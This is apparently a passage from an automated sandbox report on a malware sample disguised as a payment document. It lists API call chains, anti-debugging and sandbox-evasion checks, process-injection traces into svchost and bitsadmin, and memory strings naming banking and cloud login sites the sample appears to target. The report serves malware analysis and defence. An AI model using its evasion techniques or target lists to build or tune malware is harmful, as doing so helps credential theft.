                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_002E8111
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0029EB42
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002A123A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI/Special instruction interceptor: Address: 1228A1C
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 2470Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 7501Jump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeEvaded block: after key decisiongraph_0-93533
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-93716
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136Thread sleep count: 2470 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136Thread sleep time: -4940000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136Thread sleep count: 7501 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136Thread sleep time: -15002000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856Thread sleep time: -34000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_002C6CA9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_002C60DD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_002C63F9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002CEB60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CF56F FindFirstFileW,FindClose,0_2_002CF56F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_002CF5FA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002D1B2F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002D1C8A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_002D1F94
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0029DDC0
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,116964875?x
                Source: z5f52P3-.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: z5f52P3-.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtal.azure.comVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: discord.comVMware20,11696487552f
                Source: z5f52P3-.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2125931115.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000002.2147151002.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2125849364.0000000001272000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QeMu6`
                Source: z5f52P3-.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: entralVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: global block list test formVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552j
                Source: z5f52P3-.5.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003142000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nge Transaction PasswordVMware20`x
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: z5f52P3-.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: firefox.exe, 00000009.00000002.2694650315.0000022FA982C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: z5f52P3-.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: z5f52P3-.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: z5f52P3-.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice.comVMware20,11696487552s
                Source: z5f52P3-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552&v
                Source: z5f52P3-.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: z5f52P3-.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: z5f52P3-.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - NDCDYNVMware20,11696487552z
                Source: QvLFrfAuvuCLc.exe, 00000006.00000002.4596075851.00000000011BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tportal.hdfcbank.comVMware20,11696487552
                Source: z5f52P3-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI call chain: ExitProcess graph end nodegraph_0-93178
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI call chain: ExitProcess graph end nodegraph_0-93824
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B23 LdrLoadDll,2_2_00417B23
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002D6AAF BlockInput,0_2_002D6AAF
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00283D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00283D19
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_002B3920
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_0029E01E LoadLibraryA,GetProcAddress,0_2_0029E01E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_01227678 mov eax, dword ptr fs:[00000030h]0_2_01227678
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_01228C88 mov eax, dword ptr fs:[00000030h]0_2_01228C88
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_01228CE8 mov eax, dword ptr fs:[00000030h]0_2_01228CE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
